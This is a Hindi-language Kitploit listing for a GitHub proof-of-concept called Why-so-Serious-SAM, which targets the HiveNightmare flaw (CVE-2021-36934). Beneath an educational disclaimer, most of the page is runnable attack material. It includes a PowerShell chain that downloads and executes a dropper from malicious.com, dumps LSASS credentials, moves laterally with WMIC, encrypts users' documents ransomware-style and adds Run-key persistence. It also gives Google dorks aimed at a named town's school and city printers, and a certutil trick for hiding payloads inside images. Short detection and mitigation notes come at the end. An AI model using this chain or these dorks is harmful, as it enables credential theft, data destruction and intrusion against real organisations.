Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Why-so-Serious-SAM — PoC मैलवेयर जो विंडोज 10/11 पर LOLBins के साथ एक फाइललेस रेड टीम विधि का उपयोग करके शैडो कॉपी पर अनुचित ACLs (CVE-2021-36934) के शोषण का उपयोग करता है, स्थानीय NTLM हैश के लिए SYSTEM और SAM हाइव्स निकालता है। | Kitploit
उपकरण/GitHubGitHub/p1rat3r00t/why-so-serious-sam
विशेषाधिकार वृद्धिशोषणपार्श्व आंदोलनपोस्ट-शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगलैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubp1rat3r00t/why-so-serious-sam

Why-so-Serious-SAM

PoC मैलवेयर जो विंडोज 10/11 पर LOLBins के साथ एक फाइललेस रेड टीम विधि का उपयोग करके शैडो कॉपी पर अनुचित ACLs (CVE-2021-36934) के शोषण का उपयोग करता है, स्थानीय NTLM हैश के लिए SYSTEM और SAM हाइव्स निकालता है।

रिपॉजिटरी देखेंवेबसाइट
1201 साल पहलेअभी तक समीक्षित नहीं

HiveNightmare 'Fileless' Exploit PoC (प्रूफ ऑफ कॉन्सेप्ट):

Screenshot 2025-05-21 001453


विषय सूची

  • अवलोकन
  • विशेषताएँ
  • लैब सिमुलेशन उदाहरण
  • गूगल डॉर्क्स के साथ टोही
  • LOLBins अवलोकन
  • फ़ाइललेस ड्रॉपर एम्बेडिंग
  • प्रिंट स्पूलर और HiveNightmare का शोषण
  • रिफ्लेक्टिव DLL इंजेक्शन
  • MITRE ATT&CK मैपिंग
  • पता लगाना और शमन
  • कानूनी अस्वीकरण
  • संदर्भ और आगे पढ़ना

अवलोकन

CVE-2021-36934/HiveNightmare एक शैक्षिक लाल/बैंगनी टीम अनुसंधान परियोजना है जो Windows 11 पर एक फ़ाइललेस मैलवेयर हमले के ढाँचे का अनुकरण करती है। यह MITRE ATT&CK तकनीकों का उपयोग करके वास्तविक दुनिया के प्रतिपक्षी किल चेन का अनुकरण सक्षम बनाता है, जिसमें गुप्त, फ़ाइललेस संचालन पर ध्यान केंद्रित किया गया है।

चेतावनी: केवल पृथक प्रयोगशालाओं में अनुसंधान और प्रशिक्षण के लिए। उत्पादन या अनधिकृत प्रणालियों पर उपयोग न करें।


विशेषताएँ

  • अंत से अंत तक फ़ाइललेस रैनसमवेयर/वाइपरवेयर हमलों का अनुकरण करता है
  • लिविंग ऑफ द लैंड बाइनरीज़ (LOLBins) के उपयोग का प्रदर्शन करता है
  • क्रेडेंशियल एक्सेस, विशेषाधिकार वृद्धि, पार्श्व गति, और स्थायित्व को प्रदर्शित करता है
  • ब्लू टीम डिटेक्शन अभ्यासों के लिए व्यावहारिक लैब और टोही उदाहरण शामिल करता है
  • MITRE ATT&CK से मैप करता है

लैब सिमुलेशन उदाहरण

निम्नलिखित PowerShell सिमुलेशन बिल्ट-इन विंडोज़ टूल्स (LOLBins) का उपयोग करके एक सामान्य फ़ाइललेस रैनसमवेयर हमले की श्रृंखला प्रदर्शित करता है:

# प्रारंभिक पहुँच: ड्रॉपर लोड करें
IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# निष्पादन: इन-मेमोरी पेलोड को डिकोड और लोड करें
$bytes = [System.Convert]::FromBase64String("[Base64Payload]") 
[System.Reflection.Assembly]:https://raw.githubusercontent.com/p1rat3r00t/why-so-serious-sam/main/:Load($bytes)

# विशेषाधिकार वृद्धि
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# क्रेडेंशियल एक्सेस
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# पार्श्व गति
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# फ़ाइल एन्क्रिप्शन उदाहरण
$files = Get-ChildItem -Path "C:\Users\*\Documents" -Include *.docx,*.pdf -Recurse
foreach ($file in $files) {
  $data = Get-Content $file.FullName -Raw
  $aes = New-Object System.Security.Cryptography.AesManaged
  $aes.Key = [Text.Encoding]::UTF8.GetBytes("RANDOM-GEN-KEY-1234567890123456")
  $aes.IV = New-Object byte[] 16
  $enc = $aes.CreateEncryptor().TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($data), 0, $data.Length)
  Set-Content -Path $file.FullName -Value ([Convert]::ToBase64String($enc))
}

# स्थायित्व
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ransomware" -Value "powershell -File C:\Temp\persist.ps1"

गूगल डॉर्क्स के साथ टोही

उदाहरण उद्देश्य: मोबर्ली, मिसौरी में सार्वजनिक रूप से उजागर प्रिंटर सेवाओं की पहचान करना, जो PrintNightmare जैसे शोषण के लिए संभावित रूप से असुरक्षित हैं।

नमूना गूगल डॉर्क क्वेरीज़:

inurl:"/hp/device/this.LCDispatcher" "Moberly"
intitle:"Printer Status" "Moberly Public Schools"
intitle:"Web Image Monitor" inurl:"/wim" "Moberly"
inurl:"/printer/main.html" "City of Moberly"
intitle:"Web Jetadmin" "Moberly"
inurl:"/printers/" "Moberly"
inurl:"/PPS/public/" "Moberly"
intitle:"Konica Minolta" inurl:"/wcd/" "Moberly"
intitle:"PaperCut MF" "Moberly"
intitle:"Lexmark" inurl:"/printer/" "Moberly"
intitle:"Canon Remote UI" "Moberly"
intitle:"EpsonNet Config" "Moberly"

LOLBins अवलोकन

लिविंग ऑफ द लैंड बाइनरीज़ (LOLBins) वैध, भरोसेमंद विंडोज़ बाइनरीज़ हैं जिनका आमतौर पर प्रतिपक्षियों द्वारा सुरक्षा नियंत्रणों को दरकिनार करने और फ़ाइललेस रूप से दुर्भावनापूर्ण कोड चलाने के लिए दुरुपयोग किया जाता है।

उपयोग उदाहरण (प्रिंट सेवा हमला):

rundll32.exe \\10.10.X.X\shared\payload.dll,ReflectEntry

हमलावर rundll32.exe, regsvr32.exe, और powershell.exe जैसे LOLBins का उपयोग नेटवर्क शेयरों से पेलोड निष्पादित करने के लिए करते हैं, अक्सर टोही के माध्यम से उजागर प्रिंटर या सर्वरों की पहचान करने के बाद।


फ़ाइललेस ड्रॉपर एम्बेडिंग

लक्ष्य: छवियों के भीतर संग्रह एम्बेड करके और देशी टूल्स का उपयोग करके उन्हें निकालकर पेलोड को गुप्त रूप से वितरित करना।

चरण:

  1. पेलोड एम्बेड करें:

    copy /b nsfw.jpg + payload.7z nsfw.jpg
    
  2. निकालें और डिकोड करें:

    certutil -decode nsfw.jpg dropper.7z
    7z x dropper.7z -oC:\Users\Public\
    

यह विधि पारंपरिक फ़ाइल एक्सटेंशन फ़िल्टरिंग को दरकिनार करती है और चोरी-छिपे वितरण के लिए बिल्ट-इन टूल्स का लाभ उठाती है।


रिफ्लेक्टिव DLL इंजेक्शन

तकनीक: रिफ्लेक्टिव लोडिंग का उपयोग करके एक दुर्भावनापूर्ण DLL को सीधे मेमोरी में लोड और निष्पादित करना।

उदाहरण:

rundll32.exe \\10.10.X.X\share\nsfw.dll,ReflectEntry

यह डिस्क पर आर्टिफैक्ट छोड़े बिना गुप्त, इन-मेमोरी निष्पादन को सक्षम बनाता है।


MITRE ATT&CK मैपिंग

चरणतकनीकआईडीविवरण
प्रारंभिक पहुँचवैध खाते / ड्राइव-बाय कॉम्प्रोमाइज़T1078, T1189सार्वजनिक-सामने प्रिंट इंटरफेस से समझौता
निष्पादनDLL साइड-लोडिंग / LOLBinsT1218, T1055.001भरोसेमंद बाइनरीज़ के माध्यम से DLL को रिफ्लेक्टिव रूप से चलाना
विशेषाधिकार वृद्धिप्रिंट स्पूलर शोषण / Hive ACL उल्लंघनT1068, T1003.002सिस्टम-स्तरीय पहुँच और SAM हैश निष्कर्षण
रक्षा चोरीफ़ाइललेस निष्पादन / अस्पष्टीकृत फ़ाइलेंT1027, T1202certutil, mshta आदि के माध्यम से वितरित एन्कोडेड पेलोड
क्रेडेंशियल एक्सेसLSASS डंपिंग / SAM Hive एक्सेसT1003HiveNightmare के बाद क्रेडेंशियल डंपिंग
पार्श्व गतिSMB/नेट शेयर गणनाT1021.002प्रिंटर शेयरों या स्पूलर गणना के माध्यम से फैलना
प्रभावडेटा विनाश / एन्क्रिप्शनT1485, T1486DLL पेलोड के माध्यम से ट्रिगर किया गया फ़ाइललेस वाइपरवेयर

पता लगाना और शमन

पता लगाना

  • Sysmon + सिग्मा नियम:

    • गैर-सिस्टम DLL लोड करने वाले rundll32.exe की निगरानी करें
    • certutil.exe, regsvr32.exe, mshta.exe के असामान्य उपयोग पर नज़र रखें
    • गैर-प्रशासकों द्वारा शैडो वॉल्यूम एक्सेस को ट्रैक करें
  • SIEM उदाहरण (ELK/Splunk):

    • सार्वजनिक शेयरों से निष्पादन पर अलर्ट
    • पैरेंट/चाइल्ड प्रक्रिया विसंगतियाँ (जैसे, explorer.exe से rundll32.exe उत्पन्न करना)
    • PowerShell या CMD में संदिग्ध एन्कोडेड कमांड

शमन

  • जहाँ आवश्यक न हो वहाँ प्रिंट स्पूलर अक्षम करें:
    Stop-Service -Name Spooler -Force
    Set-Service -Name Spooler -StartupType Disabled
    
  • सभी सुरक्षा पैच लागू करें और ACL को सख्त करें
  • AppLocker या WDAC के साथ LOLBins को ब्लॉक या प्रतिबंधित करें
  • EDR समाधान का उपयोग करें जो रिफ्लेक्टिव DLL लोडिंग और इन-मेमोरी हमलों का पता लगाते हैं

कानूनी अस्वीकरण

इस रिपॉजिटरी में सभी सामग्री, कोड और तकनीकें केवल शैक्षिक और अधिकृत पेनिट्रेशन टेस्टिंग के लिए हैं। इस परियोजना के किसी भी भाग का उपयोग नियंत्रित, पृथक वातावरण के बाहर और स्पष्ट अनुमति के बिना न करें। लेखक दुरुपयोग के लिए कोई देयता नहीं मानते।


संदर्भ और आगे पढ़ना

टूल डाउनलोड करें